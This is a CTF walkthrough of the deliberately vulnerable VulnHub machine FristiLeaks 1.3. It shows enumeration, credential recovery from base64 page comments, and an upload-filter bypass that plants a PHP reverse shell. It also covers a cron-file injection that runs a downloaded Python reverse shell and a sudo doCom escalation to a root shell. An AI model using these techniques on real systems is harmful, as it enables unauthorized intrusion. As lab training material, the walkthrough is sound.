FristiLeaks 1.3 Walkthrough
FrisitLeaks 1.3 is a easy/intermediate box that is designed to be targeted as a CTF as opposed to a traditional penetration test. The challenges are mainly focused on enumeration, reverse engineering and privilege escalation.
FristiLeaks1.3 link: https://www.vulnhub.com/entry/fristileaks-13,133/
We will get started by performing port scanning on the target VM, our objective is to find all services running on the target. The target VM has a local IP of 192.168.1.104.
nmap -sS -A -sV -O -p- 192.168.1.104
The nmap results show only one service running, an Apache web server running on port 80. Nmap also shows us that we have 3 disallowed entries in the robots.txt file.
Web application analysis
The web server displays a simple web-page.
We get the following image when trying to access the disallowed entries in the robots.txt file.
The source of the web-page does not reveal any important or useful information.
We can use dirbuster to perform some directory brute forcing, however, the results do not give us any new information.
Since we have not been able to uncover any directories with dirbuster, we can perform some fuzzing based on the information found on the homepage.
We can see the word “fristi” and “fristileaks” mentioned frequently on the web-page. We can try probing directories on the web server with these names and we find that the directory “fristi” directs us to an admin login page.
The login system is simple and we can analyze the source to uncover the workings of the web-page.
The source of the log in page reveals that the developer has left some comments regarding to the workings and the content of the web-page.
In particular, there is a reference to the images on the web-page being encoded with base64 algorithm. At the bottom of the page, we also find some commented base64 content/data.
We can decrypt the data and direct the output to a .txt file for analysis in Kali.
We can see that the decoded data has a PNG file header, which means that the decrypted data is a PNG file. We can change the extension of the decrypted data from a .txt to a .png file and when we open the PNG file we get an image with a string.
This appears to be a password for the admin login page, after further analysis of the log in page source, we see a comment left by the developer with the username “eezeepz”.
We can now use the username and password combination to attempt to log in to the admin portal.
The credentials work and we are greeted with an image upload form that allows users to upload image files on the web server.
File upload vulnerability
We can try uploading a PHP reverse shell to web server using the upload form. We can use the PHP reverse shell from pentestmonkey: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Because the upload form prevents the uploading of files with any other extensions apart from .png, jpg and gif, we will need to bypass the upload filter by renaming the reverse shell to shell.php.png. We specify the attacker IP and port accordingly.
We can now upload the file to the server and setup a netcat listener.
We are made aware of the location of the uploaded reverse shell. We can navigate to the file and execute it after we have setup our listener with netcat.
After execution, we are greeted with a reverse shell with no job control, logged in as the “apache” user.
Privilege escalation from apache to admin
The home directory contains 3 directories belonging to users “admin”, “eezeepz” and “fristigod”. We have sufficient permissions to access the “eezeepz” directory.
The directory contains various system binaries and a .txt file called “notes.txt”. The output reveals the following message.
The note reveals that we can access and execute various system binaries by adding the commands to a file called “runthis” in the /tmp directory with admin privileges, after which a cronjob will execute the commands automatically after 1 minute.
We can use this to automatically execute a reverse shell, this will elevate our privileges and give us access to the user “admin”. After exploring the system binaries on the system, we see that we have python installed, which means we can use a python reverse shell.
We will be using the python reverse shell from: https://highon.coffee/blog/reverse-shell-cheat-sheet/
After modifying the reverse shell we can save it to a file called shell.py and we can then use wget to upload it to the target.
We will upload the reverse shell to the /tmp directory with wget. We will setup SimpleHTTPServer on our host to setup a simple web server that we can use to provide the file.
python -m SimpleHTTPServer
We can now use wget to download the shell from our host to the target.
After we have succesfully downloaded the shell we can now add the execution command to the “runthis” file in the /tmp directory. We can do this by using echo.
echo “/usr/bin/python /tmp/shell.py” > runthis
After we have added the command, we need to setup the listener with netcat. After a minute the command gets executed automatically and we get a reverse shell with user “admin”.
We can now access the user “admin” home directory where we find 3 interesting files.
We discover that cryptedpass.txt and whoisyourgodnow.txt are files that contain encrypted passwords, after inspection of the file cryptpass.py we discover that is a simple script that encodes strings in to base64 first then in to rot13. We can reverse engineer the script to decode the encrypted strings.
Reverse engineering python code
After reverse engineering the code, we can use the script to decode the encrypted strings in cryptedpass.txt and whoisyourgodnow.txt.
We get the following strings after decoding.
Privilege escalation from admin to frisitgod
After exploting the /etc/passwd file, we can see that we have a user called “fristigod” that we can switch to, we can use the decrypted passwords to login.
After trying out the 2 passwords, we discover that “LetThereBeFristi!” is the correct password and we are now logged in as user “fristigod”.
We can also access the home directory for the user “fristigod”, however we discover that it does not contain any useful files. We still need to acquire root access and find the flag located in the root directory.
We can use the find command to search for files on the system that belong to the user “frisitgod”
find / -user fristigod
We discover that we have a directory that belongs to “frisitigod” in the /var directory.
After further exploration of this directory and the .bash_history we discover that we can use the user “frisit” to run root commands with a binary called doCom located in the /var/frisitgod/.secret_admin_stuff directory.
We can therefore use the doCom binary to execute a reverse shell with root privileges.
Privilege escalation from frisitgod to root
We can use a python reverse shell because we have access to the binaries and we can run it as root. We upload the shell to the /var/fristigod/.secret_admin_stuff directory and setup a listener.
After we have uploaded the shell, we can use the user “fristi” to execute the revere shell by using the following command.
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /usr/bin/python /var/fristigod/.secret_admin_stuff/shell.py
After executing the command we will be prompted to enter the password for the user “frisitgod”, after which the command will be executed and we will get a reverse shell with root privileges.
We can then browse to the /root directory and access the flag.